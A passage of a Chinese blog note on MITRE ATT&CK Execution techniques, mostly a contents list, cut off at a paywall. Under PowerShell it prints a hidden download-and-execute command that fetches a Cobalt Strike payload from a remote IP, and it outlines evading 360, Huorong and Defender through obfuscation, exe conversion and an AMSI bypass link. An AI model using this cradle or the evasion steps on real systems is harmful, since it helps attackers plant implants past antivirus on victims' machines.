ATT&CK-Execution

「已注销」

于 2021-09-18 09:15:59 发布

阅读量546

点赞数

分类专栏：笔记

版权声明：本文为博主原创文章，遵循 CC 4.0 BY-SA 版权协议，转载请附上原文出处链接和本声明。

本文链接：https://blog.csdn.net/xmd213131/article/details/114935081

版权

文章目录

Command and Scripting Interpreter
Inter-Process Communication
- Component Object Model
- Dynamic Data Exchange
Native API
Shared Modules
System Services
- Service Execution
User Execution
- Malicious Link
- Malicious File
Windows Management Instrumentation

Command and Scripting Interpreter

T1059.001 PowerShell

基础命令

一句话上线：

CSpowershell上线：

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.123.143:8888/1'))"

对于一句话下载的payload：免杀火绒或者360静态查杀的方法，使用CS生成powershell版本的payload，使用Invoke-Obfuscation进行混淆，然后使用ps1toexe将其转为exe，或者直接放到服务器上，使用上面的一句话上线。

但是一句话上线360/火绒都会进行行为拦截，而defender由于存在amsi，需要使用[bypass amsi](https://github.com/S3cur3Th1sSh1t/Amsi-Bypass-Powershell)后再运行

对于火绒的绕过方法：

参考文章：

最低0.47元/天解锁文章

评论 1

被折叠的条评论为什么被折叠?

到【灌水乐园】发言

查看更多评论

添加红包

成就一亿技术人!

hope_wisdom

发出的红包

实付元

使用余额支付

点击重新获取

扫码支付

钱包余额 0

抵扣说明：

1.余额是钱包充值的虚拟货币，按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载，可以购买VIP、付费专栏及课程。